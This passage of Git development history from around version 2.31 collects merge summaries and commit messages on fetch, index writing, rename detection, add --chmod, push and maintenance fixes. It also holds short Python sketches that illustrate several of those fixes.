The code to fsck objects received across multiple packs during a
single git fetch session was broken when the packfile URI
feature was in use. A workaround has been added by disabling the
codepath that avoids keeping a packfile that is too small.
* jt/transfer-fsck-across-packs-fix:
fetch-pack: do not mix --pack_header and packfile uri
When fetching (as opposed to cloning) from a repository with packfile
URIs enabled, an error like this may occur:
fatal: pack has bad object at offset 12: unknown object type 5
fatal: finish_http_pack_request gave result -1
fatal: fetch-pack: expected keep then TAB at start of http-fetch output
This bug was introduced in b664e9ffa1 ("fetch-pack: with packfile URIs,
use index-pack arg", 2021-02-22), when the index-pack args used when
processing the inline packfile of a fetch response and when processing
packfile URIs were unified.
This bug happens because fetch, by default, partially reads (and
consumes) the header of the inline packfile to determine if it should
store the downloaded objects as a packfile or loose objects, and thus
passes --pack_header=<...> to index-pack to inform it that some bytes
are missing. However, when it subsequently fetches the additional
packfiles linked by URIs, it reuses the same index-pack arguments, thus
wrongly passing --index-pack-arg=--pack_header=<...> when no bytes are
missing.
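To make "consuming the header" concrete, here is a minimal Python sketch
(not Git's C code). It assumes the usual 12-byte pack header layout (the
signature "PACK", a 4-byte version and a 4-byte object count, all in
network byte order) and assumes the argument takes the form
--pack_header=<version>,<entries>. Both function names are hypothetical.

```python
import struct

PACK_HEADER_SIZE = 12  # b"PACK" + 4-byte version + 4-byte object count


def parse_pack_header(data):
    """Return (version, entries) read from the first 12 bytes of a pack."""
    if len(data) < PACK_HEADER_SIZE:
        raise ValueError("pack stream is shorter than its header")
    signature, version, entries = struct.unpack(">4sII", data[:PACK_HEADER_SIZE])
    if signature != b"PACK":
        raise ValueError("not a pack stream")
    return version, entries


def index_pack_args(header_already_consumed, version, entries):
    """Hypothetical helper: mention the header only if its bytes are gone."""
    args = ["index-pack", "--stdin"]
    if header_already_consumed:
        # The reader of the stream will not see the header, so tell it
        # what the header said.
        args.append(f"--pack_header={version},{entries}")
    return args
```

A pack downloaded from a URI still starts with its header, so the second
argument list (without --pack_header) is the one that applies to it. As a
side note, if the leading "P" (0x50) is read as the first byte of an
object entry, its type bits are (0x50 >> 4) & 7 = 5, which is consistent
with the "unknown object type 5" error quoted above.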
This does not happen when cloning because "git clone" always passes
do_keep, which instructs the fetch mechanism to always retain the
packfile, eliminating the need to read the header.
There are a few ways to fix this, including filtering out pack_header
arguments when downloading the additional packfiles, but I decided to
stick to always using index-pack throughout when packfile URIs are
present - thus, Git no longer needs to read the bytes, and no longer
needs --pack_header here.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There were some early changes in the 2.31 cycle to optimize some setup
in diffcore-rename.c[1], some later changes to measure performance[2],
and finally some significant changes to improve rename detection
performance[3]. The final one was merged with the note
Performance optimization work on the rename detection continues.
That works for the commit log, but feels misleading as a release note
since all the changes were within one cycle. Simplify this to just
Performance improvements for rename detection.
The former wording could be seen as hinting that more performance
improvements will come in 2.32, which is true, but we can just cover
those in the 2.32 release notes when the time comes.
[1] a5ac31b5b1 (Merge branch 'en/diffcore-rename', 2021-01-25)
[2] d3a035b055 (Merge branch 'en/merge-ort-perf', 2021-02-11)
[3] 12bd17521c (Merge branch 'en/diffcore-rename', 2021-03-01)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Work around platforms whose open() is reported to return EINTR (it
shouldn't, as we do our signals with SA_RESTART).
* jk/open-returns-eintr:
config.mak.uname: enable OPEN_RETURNS_EINTR for macOS Big Sur
Makefile: add OPEN_RETURNS_EINTR knob
This commit causes breakage on macOS, or in fact any platform using
older versions of Tcl. Revert it.
* py/revert-commit-comments:
Revert "git-gui: remove lines starting with the comment character"
This reverts commit b9a43869c9.
This commit causes breakage on macOS (10.13). It causes errors on
startup and completely breaks the commit functionality. There are two
main problems. First, it uses `string cat` which is not supported on
older Tcl versions. Second, it does a half close of the bidirectional
pipe to git-stripspace which is also not supported on older Tcl
versions.
Reported-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
Raise the buffer size used when writing the index file out from
(obviously too small) 8kB to (clearly sufficiently large) 128kB.
* ns/raise-write-index-buffer-size:
read-cache: make the index write buffer size 128K
The logic to handle "trailer" related placeholders in the
"--format=" mechanisms in the "log" family and "for-each-ref"
family is getting unified.
* hv/trailer-formatting:
ref-filter: use pretty.c logic for trailers
pretty.c: capture invalid trailer argument
pretty.c: refactor trailer logic to `format_set_trailers_options()`
t6300: use function to test trailer options
Test script modernization.
* sv/t7001-modernize:
t7001: use `test` rather than `[`
t7001: use here-docs instead of echo
t7001: put each command on a separate line
t7001: use '>' rather than 'touch'
t7001: avoid using `cd` outside of subshells
t7001: remove whitespace after redirect operators
t7001: modernize subshell formatting
t7001: remove unnecessary blank lines
t7001: indent with TABs instead of spaces
t7001: modernize test formatting
The approach to "fsck" the incoming objects in "index-pack" is
attractive for performance reasons (we have them already in core,
inflated and ready to be inspected), but fundamentally cannot be
applied fully when we receive more than one pack stream. For
example, when we want to inspect blobs that are used as
".gitmodules" files, a tree object in one pack may refer to a blob
object in another pack as ".gitmodules". Teach "index-pack" to emit
objects that must be inspected later and check them in the calling
"fetch-pack" process.
* jt/transfer-fsck-across-packs:
fetch-pack: print and use dangling .gitmodules
fetch-pack: with packfile URIs, use index-pack arg
http-fetch: allow custom index-pack args
http: allow custom index-pack args
The common code to deal with "chunked file format" that is shared
by the multi-pack-index and commit-graph files has been factored
out, to help codepaths for both filetypes to become more robust.
* ds/chunked-file-api:
commit-graph.c: display correct number of chunks when writing
chunk-format: add technical docs
chunk-format: restore duplicate chunk checks
midx: use 64-bit multiplication for chunk sizes
midx: use chunk-format read API
commit-graph: use chunk-format read API
chunk-format: create read chunk API
midx: use chunk-format API in write_midx_internal()
midx: drop chunk progress during write
midx: return success/failure in chunk write methods
midx: add num_large_offsets to write_midx_context
midx: add pack_perm to write_midx_context
midx: add entries to write_midx_context
midx: use context in write_midx_pack_names()
midx: rename pack_info to write_midx_context
commit-graph: use chunk-format write API
chunk-format: create chunk format write API
commit-graph: anonymize data in chunk_write_fn
Performance optimization work on the rename detection continues.
* en/diffcore-rename:
merge-ort: call diffcore_rename() directly
gitdiffcore doc: mention new preliminary step for rename detection
diffcore-rename: guide inexact rename detection based on basenames
diffcore-rename: complete find_basename_matches()
diffcore-rename: compute basenames of source and dest candidates
t4001: add a test comparing basename similarity and content similarity
diffcore-rename: filter rename_src list when possible
diffcore-rename: no point trying to find a match better than exact
Preliminary changes to fsmonitor integration.
* jh/fsmonitor-prework:
fsmonitor: refactor initialization of fsmonitor_last_update token
fsmonitor: allow all entries for a folder to be invalidated
fsmonitor: log FSMN token when reading and writing the index
fsmonitor: log invocation of FSMonitor hook to trace2
read-cache: log the number of scanned files to trace2
read-cache: log the number of lstat calls to trace2
preload-index: log the number of lstat calls to trace2
p7519: add trace logging during perf test
p7519: move watchman cleanup earlier in the test
p7519: fix watchman watch-list test on Windows
p7519: do not rely on "xargs -d" in test
This reverts commit c85eec7fc3, as
it is a bit overzealous, we are in prerelease freeze, and we want
to have enough time to get this right and cook in 'next'.
cf. <8735xgkvuo.fsf@evledraar.gmail.com>
We've had mixed reports on whether the latest release of macOS needs
this Makefile knob set. In most reported cases, there's antivirus
software running (which one might imagine could cause an open() call to
be delayed). However, one of the (off-list) reports I've gotten
indicated that it happened on an otherwise clean install of Big Sur.
Since the symptom is so bad (checkout randomly fails to write several
files when the progress meter kicks in), and since the workaround is so
lightweight (if we don't see EINTR, it's just an extra conditional
check), let's just turn it on by default.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On some platforms, open() reportedly returns EINTR when opening regular
files and we receive a signal (usually SIGALRM from our progress meter).
This shouldn't happen, as open() should be a restartable syscall, and we
specify SA_RESTART when setting up the alarm handler. So it may actually
be a kernel or libc bug for this to happen. But it has been reported on
at least one version of Linux (on a network filesystem):
https://lore.kernel.org/git/c8061cce-71e4-17bd-a56a-a5fed93804da@neanderfunk.de/
as well as on macOS starting with Big Sur even on a regular filesystem.
We can work around it by retrying open() calls that get EINTR, just as
we do for read(), etc. Since we don't ever _want_ to interrupt an open()
call, we can get away with just redefining open, rather than insisting
all callsites use xopen().
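The retry itself is a small loop. The following Python sketch shows only
its shape; it is not the C macro this patch adds. Python's own os.open()
already retries on EINTR, so the sketch takes the opener as a parameter
(a hypothetical stand-in for the raw open() call) in order to be able to
demonstrate the loop.

```python
def open_retrying_eintr(opener, *args):
    """Call opener(*args), retrying for as long as a signal interrupts it."""
    while True:
        try:
            return opener(*args)
        except InterruptedError:
            # EINTR: nothing was opened, so it is safe to just try again.
            continue
```

If no EINTR is ever seen, the only extra cost is the failed-call check,
which matches the "extra conditional" cost described for the workaround.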
We actually do have an xopen() wrapper already (and it even does this
retry, though there's no indication of it being an observed problem back
then; it seems simply to have been lifted from xread(), etc). But it is
used hardly anywhere, and isn't suitable for general use because it will
die() on error. In theory we could combine the two, but it's awkward to
do so because of the variable-args interface of open().
This patch adds a Makefile knob for enabling the workaround. It's not
enabled by default for any platforms in config.mak.uname yet, as we
don't have enough data to decide how common this is (I have not been
able to reproduce on either Linux or Big Sur myself). It may be worth
enabling preemptively anyway, since the cost is pretty low (if we don't
see an EINTR, it's just an extra conditional).
However, note that we must not enable this on Windows. It doesn't do
anything there, and the macro overrides the existing mingw_open()
redirection. I've added a preemptive #undef here in the mingw header
(which is processed first) to just quietly disable it (we could also
make it an #error, but there is little point in being so aggressive).
Reported-by: Aleksey Kliger <alklig@microsoft.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git push $there --delete ''" should have been diagnosed as an
error, but instead turned into a matching push, which has been
corrected.
* jc/push-delete-nothing:
push: do not turn --delete '' into a matching push
A handful of multi-word configuration variable names in
documentation that are spelled in all lowercase have been corrected
to use the more canonical camelCase.
* dl/doc-config-camelcase:
index-format doc: camelCase core.excludesFile
blame-options.txt: camelcase blame.blankBoundary
i18n.txt: camel case and monospace "i18n.commitEncoding"
The "git maintenance register" command had trouble registering bare
repositories, which has been corrected.
* es/maintenance-of-bare-repositories:
maintenance: fix incorrect `maintenance.repo` path with bare repository
Various fixes on "git add --chmod".
* mt/add-chmod-fixes:
add: propagate --chmod errors to exit status
add: mark --chmod error string for translation
add --chmod: don't update index when --dry-run is used
The code to implement "git merge-base --independent" was poorly
done and was kept from the very beginning of the feature.
* ds/merge-base-independent:
commit-reach: stale commits may prune generation further
commit-reach: use heuristic in remove_redundant()
commit-reach: move compare_commits_by_gen
commit-reach: use one walk in remove_redundant()
commit-reach: reduce requirements for remove_redundant()
"git rebase --[no-]fork-point" gained a configuration variable
rebase.forkPoint so that users do not have to keep specifying a
non-default setting.
* ah/rebase-no-fork-point-config:
rebase: add a config option for --no-fork-point
"git grep" has been tweaked to be limited to the sparse checkout
paths.
* mt/grep-sparse-checkout:
grep: honor sparse-checkout on working tree searches
"git difftool" learned "--skip-to=<path>" option to restart an
interrupted session from an arbitrary path.
* zh/difftool-skip-to:
difftool.c: learn a new way start at specified file
"git {diff,log} --{skip,rotate}-to=<path>" allows the user to
discard diff output for early paths or move them to the end of the
output.
* jc/diffcore-rotate:
diff: --{rotate,skip}-to=<path>
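The difference between the two options can be sketched on a plain list of
paths. This is an illustrative Python model, not the diffcore code; the
function names are hypothetical, and raising an error when the path is
not part of the diff is an assumption of this sketch.

```python
def _index_of(paths, target):
    """Position of `target` in the diff output order."""
    try:
        return paths.index(target)
    except ValueError:
        # Assumption of this sketch: a missing path is treated as an error.
        raise ValueError(f"no such path in the diff: {target}") from None


def skip_to(paths, target):
    """Discard the paths that come before `target`."""
    return paths[_index_of(paths, target):]


def rotate_to(paths, target):
    """Start at `target` and move the earlier paths to the end."""
    i = _index_of(paths, target)
    return paths[i:] + paths[:i]
```

With paths a.c, b.c and c.c, skipping to b.c leaves b.c and c.c, while
rotating to b.c yields b.c, c.c and then a.c.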
The error codepath around the "--temp/--prefix" feature of "git
checkout-index" has been improved.
* mt/checkout-index-corner-cases:
checkout-index: omit entries with no tempname from --temp output
write_entry(): fix misuses of `path` in error messages
Objects that lost references can be pruned away, even when they
have notes attached to them (and these notes will become dangling,
which in turn can be pruned with "git notes prune"). This has been
clarified in the documentation.
* mz/doc-notes-are-not-anchors:
docs: clarify that refs/notes/ do not keep the attached objects alive
Removal of GIT_TEST_GETTEXT_POISON continues.
* ab/detox-gettext-tests:
tests: remove most uses of test_i18ncmp
tests: remove last uses of C_LOCALE_OUTPUT
tests: remove most uses of C_LOCALE_OUTPUT
tests: remove last uses of GIT_TEST_GETTEXT_POISON=false
All other references to blame.* configuration variables are
camelCased already. Update this one to match.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 95791be750 (doc: camelCase the i18n config variables to improve
readability, 2017-07-17), the other i18n config variables were
camel cased. However, this one instance was missed.
Camel case and monospace "i18n.commitEncoding" so that it matches the
surrounding text.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
[jc: fixed 3 other mistakes that are exactly the same]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Writing an index 8K at a time invokes the OS filesystem and caching code
very frequently, introducing noticeable overhead while writing large
indexes. When experimenting with different write buffer sizes on Windows
while writing the Windows OS repo index (260MB), most of the benefit came
from bumping the index write buffer size to 64K. I picked 128K to ensure that
we're past the knee of the curve.
With this change, the time under do_write_index for an index with 3M
files goes from ~1.02s to ~0.72s.
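A rough way to see why the buffer size matters is to count buffer
flushes. The Python sketch below is only arithmetic, not a measurement;
it assumes that "260MB" means 260 MiB and that every flush writes one
full buffer.

```python
KIB = 1024
MIB = 1024 * KIB


def write_calls(index_size, buffer_size):
    """Number of buffer flushes needed to write `index_size` bytes."""
    return -(-index_size // buffer_size)  # ceiling division


index_size = 260 * MIB
flushes_8k = write_calls(index_size, 8 * KIB)      # 33280
flushes_64k = write_calls(index_size, 64 * KIB)    # 4160
flushes_128k = write_calls(index_size, 128 * KIB)  # 2080
```

Going from 8K to 128K cuts the number of flushes by a factor of 16 under
these assumptions.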
Signed-off-by: Neeraj Singh <neerajsi@ntdev.microsoft.com>
Acked-by: Jeff Hostetler <jeffhost@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If `add` encounters an error while applying the --chmod changes, it
prints a message to stderr, but exits with a success code. This might
have been an oversight, as the command does exit with a non-zero code in
other situations where it cannot (or refuses to) update all of the
requested paths (e.g. when some of the given paths are ignored). So make
the exit behavior more consistent by also propagating --chmod errors to
the exit status.
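The intended behavior can be modeled as follows. This Python sketch is
not the code in builtin/add.c; the function names and the error text are
hypothetical, and `chmod_one` stands in for whatever applies the mode
change to a single path.

```python
import sys


def add_with_chmod(paths, chmod_one):
    """Apply chmod_one to every path; return a non-zero status on any error."""
    exit_status = 0
    for path in paths:
        try:
            chmod_one(path)
        except OSError as err:
            # Report the problem, keep going, but remember that we failed.
            print(f"error: cannot chmod '{path}': {err}", file=sys.stderr)
            exit_status = 1
    return exit_status
```

All paths are still processed, so one bad path does not hide errors on
later ones, and the caller sees a failure if any of them failed.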
Note: the test "all statuses changed in folder if . is given" uses paths
added by previous test cases, some of which might be symbolic links.
Because `git add --chmod` will now fail with such paths, this test would
depend on whether all the previous tests were executed, or only some
of them. Avoid that by running the test on a fresh repo with only
regular files.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This error message is intended for humans, so mark it for translation.
Also use error() instead of fprintf(stderr, ...), to make the
corresponding line a bit cleaner, and to display the "error:" prefix,
which helps classify the nature/severity of the message.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git add --chmod` applies the mode changes even when `--dry-run` is
used. Fix that and add some tests for this option combination.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use FLEX_ALLOC_STR() to allocate the `struct untracked_cache_dir`
for the root directory. Get rid of unsafe code that might fail to
initialize the `name` field (if FLEX_ARRAY is not 1). This will
make it clear that we intend to have a structure with an empty
string following it.
A problem was observed on Windows where the length of the memset() was
too short, so the first byte of the name field was not zeroed. This
resulted in the name field having garbage from a previous use of that
area of memory.
The record for the root directory was then written to the untracked-cache
extension in the index. This garbage would then be visible to future
commands when they reloaded the untracked-cache extension.
Since the directory record for the root directory had garbage in the
`name` field, the `t/helper/test-tool dump-untracked-cache` tool
printed this garbage as the path prefix (rather than '/') for each
directory in the untracked cache as it recursed.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some users (myself included) would prefer to have this feature off by
default because it can silently drop commits.
Signed-off-by: Alex Henrie <alexhenrie24@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When writing a commit-graph, a progress meter is shown which indicates
the number of pieces of data to write (one per commit in each chunk).
In 47410aa837 (commit-graph: use chunk-format write API, 2021-02-18),
the number of chunks became tracked by the new chunk-format API. But a
stray local variable was left behind from when write_commit_graph_file()
used to keep track of the same.
Since this was no longer updated after 47410aa837, the progress meter
appeared broken:
$ git commit-graph write --reachable
Expanding reachable commits in commit graph: 837569, done.
Writing out commit graph in 3 passes: 166% (4187845/2512707), done.
Drop the local variable and rely instead on the chunk-format API to tell
us the correct number of chunks.
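The numbers in the output above can be checked by hand. The Python
sketch below is only arithmetic on those numbers; reading the totals as
"3 chunks expected, 5 chunks written" is an inference from that
arithmetic, and integer truncation of the percentage is an assumption.

```python
commits = 837569  # from "Expanding reachable commits in commit graph"


def percent(done, total):
    """Integer percentage, truncated."""
    return done * 100 // total


stale_total = 3 * commits  # what the leftover local variable implied
written = 5 * commits      # what was actually counted while writing
shown = percent(written, stale_total)  # 166
```

Both totals in the log line are exact multiples of the commit count,
which is why a stale chunk count explains the 166% figure.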
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we added the syntactic sugar "git push remote --delete <ref>" to
"git push" as a synonym for the canonical "git push remote :<ref>"
syntax at f517f1f2 (builtin-push: add --delete as syntactic sugar
for :foo, 2009-12-30), we weren't careful enough to make sure that
<ref> is not empty.
Blindly rewriting "--delete <ref>" to ":<ref>" means that an empty
string <ref> results in refspec ":", which is the syntax to ask for
"matching" push that does not delete anything.
Worse yet, if there were matching refs that can be fast-forwarded,
they would have been published prematurely, even if the user feels
that they are not ready yet to be pushed out, which would be a real
disaster.
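The rewrite and the missing check can be shown in a few lines. This is a
Python model of the string manipulation only, not the code in
builtin/push.c; the function name and the error text are hypothetical.

```python
def delete_refspec(ref):
    """Turn the argument of --delete into a deleting refspec."""
    if not ref:
        # Without this check, "" would become ":", the matching refspec.
        raise ValueError("--delete needs a non-empty ref name")
    return ":" + ref


naive = ":" + ""  # what the blind rewrite produced for an empty <ref>
```

Here `naive` is exactly ":", which asks for a matching push, while a
non-empty name such as "topic" becomes ":topic" as intended.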
Noticed-by: Tilman Vogel <tilman.vogel@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We describe the stricter date formats accepted by GIT_COMMITTER_DATE,
etc, but the --date option also allows the looser approxidate formats.
Unfortunately we don't have a good or complete reference for
this format, but let's at least mention that it _is_ looser, and give a
few examples.
If we ever write separate, more complete date-format documentation, we
should refer to it from here.
Based-on-a-patch-by: Utku Gultopu <ugultopu@gmail.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When an error message informs the user about an incorrect command
invocation, it should refer to "arguments", not "parameters".
Signed-off-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This adds yet another vimdiff/gvimdiff variant and presents conflicts as
a two-way diff between 'LOCAL' and 'REMOTE'. 'MERGED' is not opened,
which deviates from the norm, so usage text is echoed as a Vim message on
startup that tells the user how to proceed and how to abort.
Vimdiff is well-suited to two-way diffs so this is an option for a
simpler, more streamlined conflict resolution. For example: it is
difficult to communicate differences across more than two files using
only syntax highlighting; default vimdiff commands to get and put
changes between buffers do not need the user to manually specify
a source or destination buffer when only using two buffers.
Like other merge tools that directly compare 'LOCAL' with 'REMOTE', this
tool will benefit when paired with the new `mergetool.hideResolved`
setting.
Signed-off-by: Seth House <seth@eseth.com>
Tested-by: David Aguilar <davvid@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On Windows we can't delete or overwrite files opened by other processes. Here we
sketch how to handle this situation.
We propose to use a random element in the filename. It's possible to design an
alternate solution based on counters, but that would assign semantics to the
filenames that complicates implementation.
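As an illustration of the idea only, a random element can be appended to
an otherwise fixed name so that a new file never has to replace one that
another process still holds open. In this Python sketch the name layout,
the ".ref" suffix and the function name are all hypothetical; the
document being patched defines the real naming.

```python
import secrets


def unique_table_name(stem, suffix=".ref", token=secrets.token_hex):
    """Return `stem` plus a random hex element, e.g. 'stem-1a2b3c4d.ref'."""
    # token(4) yields 8 hex digits; the name carries no ordering semantics.
    return f"{stem}-{token(4)}{suffix}"
```

Because the random part has no meaning, readers never need to interpret
it, which is the property that a counter-based scheme would give up.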
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The periodic maintenance tasks configured by `git maintenance start`
invoke `git for-each-repo` to run `git maintenance run` on each path
specified by the multi-value global configuration variable
`maintenance.repo`. Because `git for-each-repo` will likely be run
outside of the repositories which require periodic maintenance, it is
mandatory that the repository paths specified by `maintenance.repo` are
absolute.
Unfortunately, however, `git maintenance register` does nothing to
ensure that the paths it assigns to `maintenance.repo` are indeed
absolute, and may in fact -- especially in the case of a bare repository
-- assign a relative path to `maintenance.repo` instead. Fix this
problem by converting all paths to absolute before assigning them to
`maintenance.repo`.
While at it, also fix `git maintenance unregister` to convert paths to
absolute, as well, in order to ensure that it can correctly remove from
`maintenance.repo` a path assigned via `git maintenance register`.
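The conversion is the same for both subcommands, which is what lets
"unregister" find the entry that "register" wrote. The Python sketch
below models that with POSIX-style paths; it is not the code in
builtin/gc.c, and the function name and example paths are hypothetical.

```python
import posixpath


def to_absolute(path, cwd):
    """Resolve `path` against `cwd` unless it is already absolute."""
    if posixpath.isabs(path):
        return posixpath.normpath(path)
    return posixpath.normpath(posixpath.join(cwd, path))


# A bare repository may describe itself as "." relative to its own
# directory; both subcommands must turn that into the same absolute path.
registered = to_absolute(".", "/srv/git/project.git")
unregistered = to_absolute(".", "/srv/git/project.git")
```

Both values are "/srv/git/project.git", a path that remains meaningful
when `git for-each-repo` runs from some other directory.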
Reported-by: Clement Moyroud <clement.moyroud@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Test framework clean-up.
* ab/test-lib:
test-lib-functions: assert correct parameter count
test-lib-functions: remove bug-inducing "diagnostics" helper param
test libs: rename "diff-lib" to "lib-diff"
t/.gitattributes: sort lines
test-lib-functions: move function to lib-bitmap.sh
test libs: rename gitweb-lib.sh to lib-gitweb.sh
test libs: rename bundle helper to "lib-bundle.sh"
test-lib-functions: remove generate_zero_bytes() wrapper
test-lib-functions: move test_set_index_version() to its user
test lib: change "error" to "BUG" as appropriate
test-lib: remove check_var_migration
A small memleak in "diff -I<regexp>" has been corrected.
* ab/diff-deferred-free:
diff: plug memory leak from regcomp() on {log,diff} -I
diff: add an API for deferred freeing
When a pager spawned by us exited, the trace log did not record its
exit status correctly, which has been corrected.
* ab/pager-exit-log:
pager: properly log pager exit code when signalled
run-command: add braces for "if" block in wait_or_whine()
pager: test for exit code with and without SIGPIPE
pager: refactor wait_for_pager() function
Update formatting and grammar of the hash transition plan
documentation, plus some updates.
* ta/hash-function-transition-doc:
doc: use https links
doc hash-function-transition: move rationale upwards
doc hash-function-transition: fix incomplete sentence
doc hash-function-transition: use upper case consistently
doc hash-function-transition: use SHA-1 and SHA-256 consistently
doc hash-function-transition: fix asciidoc output
Signed commits and tags now allow verification of objects, whose
two object names (one in SHA-1, the other in SHA-256) are both
signed.
* bc/signed-objects-with-both-hashes:
gpg-interface: remove other signature headers before verifying
ref-filter: hoist signature parsing
commit: allow parsing arbitrary buffers with headers
gpg-interface: improve interface for parsing tags
commit: ignore additional signatures when parsing signed commits
ref-filter: switch some uses of unsigned long to size_t
Documentation, code and test clean-up around "git stash".
* dl/stash-cleanup:
stash: declare ref_stash as an array
t3905: use test_cmp() to check file contents
t3905: replace test -s with test_file_not_empty
t3905: remove nested git in command substitution
t3905: move all commands into test cases
t3905: remove spaces after redirect operators
git-stash.txt: be explicit about subcommand options
write_commit_graph initialises topo_levels using init_topo_level_slab().
Next it calls compute_topological_levels(), which can cause the slab to
grow. We therefore need to clear the slab again using
clear_topo_level_slab() when we're done.
First introduced in 72a2bfca (commit-graph: add a slab to store
topological levels, 2021-01-16).
LeakSanitizer output:
==1026==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 8 byte(s) in 1 object(s) allocated from:
#0 0x498ae9 in realloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:164:3
#1 0xafbed8 in xrealloc /src/git/wrapper.c:126:8
#2 0x7966d1 in topo_level_slab_at_peek /src/git/commit-graph.c:71:1
#3 0x7965e0 in topo_level_slab_at /src/git/commit-graph.c:71:1
#4 0x78fbf5 in compute_topological_levels /src/git/commit-graph.c:1472:12
#5 0x78c5c3 in write_commit_graph /src/git/commit-graph.c:2456:2
#6 0x535c5f in graph_write /src/git/builtin/commit-graph.c:299:6
#7 0x5350ca in cmd_commit_graph /src/git/builtin/commit-graph.c:337:11
#8 0x4cddb1 in run_builtin /src/git/git.c:453:11
#9 0x4cabe2 in handle_builtin /src/git/git.c:704:3
#10 0x4cd084 in run_argv /src/git/git.c:771:4
#11 0x4ca424 in cmd_main /src/git/git.c:902:19
#12 0x707fb6 in main /src/git/common-main.c:52:11
#13 0x7fee4249383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
Indirect leak of 524256 byte(s) in 1 object(s) allocated from:
#0 0x498942 in calloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
#1 0xafc088 in xcalloc /src/git/wrapper.c:140:8
#2 0x796870 in topo_level_slab_at_peek /src/git/commit-graph.c:71:1
#3 0x7965e0 in topo_level_slab_at /src/git/commit-graph.c:71:1
#4 0x78fbf5 in compute_topological_levels /src/git/commit-graph.c:1472:12
#5 0x78c5c3 in write_commit_graph /src/git/commit-graph.c:2456:2
#6 0x535c5f in graph_write /src/git/builtin/commit-graph.c:299:6
#7 0x5350ca in cmd_commit_graph /src/git/builtin/commit-graph.c:337:11
#8 0x4cddb1 in run_builtin /src/git/git.c:453:11
#9 0x4cabe2 in handle_builtin /src/git/git.c:704:3
#10 0x4cd084 in run_argv /src/git/git.c:771:4
#11 0x4ca424 in cmd_main /src/git/git.c:902:19
#12 0x707fb6 in main /src/git/common-main.c:52:11
#13 0x7fee4249383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
SUMMARY: AddressSanitizer: 524264 byte(s) leaked in 2 allocation(s).
Signed-off-by: Andrzej Hunt <ajrhunt@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git difftool` only allows us to view files one at a time, in order.
If there is a commit with many files and we exit in the middle,
we will have to traverse the list again to get to the file diff which
we want to see. Therefore, teach the command an option
`--skip-to=<path>` to allow the user to say that diffs for earlier
paths are not interesting (because they were already seen in an
earlier session) and start this session with the named path.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The remove_redundant_with_gen() algorithm performs a depth-first-search
to find commits in the 'array' list, starting at the parents of each
commit in 'array'. The result is that commits in 'array' are marked
STALE when they are reachable from another commit in 'array'.
This depth-first-search is fast when commits lie on or near the
first-parent history of the higher commits. The search terminates early
if all but one commit becomes marked STALE.
However, it is possible that there are two independent commits with high
generation number. In that case, the depth-first-search might languish
by searching in lower generations due to the fixed min_generation used
throughout the method.
With the expectation that commits with lower generation become STALE
more often, we can optimize further by increasing that
min_generation boundary upon discovery of the commit with minimum
generation.
We must first sort the commits in 'array' by generation. We cannot sort
'array' itself since it must preserve relative order among the returned
results (see revision.c:mark_redundant_parents() for an example).
This simplifies the initialization of min_generation, but it also allows
us to increase the new min_generation when we find the commit with
smallest generation remaining.
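The idea can be sketched in Python on a toy commit graph. This is a
simplified model, not the C implementation: `parents` and `generation`
are plain dictionaries (hypothetical inputs), the early exit when only
one commit remains is left out, and the function name is made up for
illustration.

```python
def independent(commits, parents, generation):
    """Return the commits not reachable from another commit in the list."""
    if not commits:
        return []
    # Sorted copy; `commits` itself keeps its order for the result.
    by_gen = sorted(commits, key=lambda c: generation[c])
    targets = set(commits)
    stale = set()
    lowest = 0  # index of the lowest-generation commit not yet STALE
    min_generation = generation[by_gen[0]]

    for start in commits:
        stack = list(parents.get(start, ()))
        seen = set()
        while stack:
            commit = stack.pop()
            # Nothing below the floor can lead to a still-live target.
            if commit in seen or generation[commit] < min_generation:
                continue
            seen.add(commit)
            if commit in targets and commit not in stale:
                stale.add(commit)
                # Raise the floor to the smallest generation remaining.
                while lowest < len(by_gen) - 1 and by_gen[lowest] in stale:
                    lowest += 1
                min_generation = generation[by_gen[lowest]]
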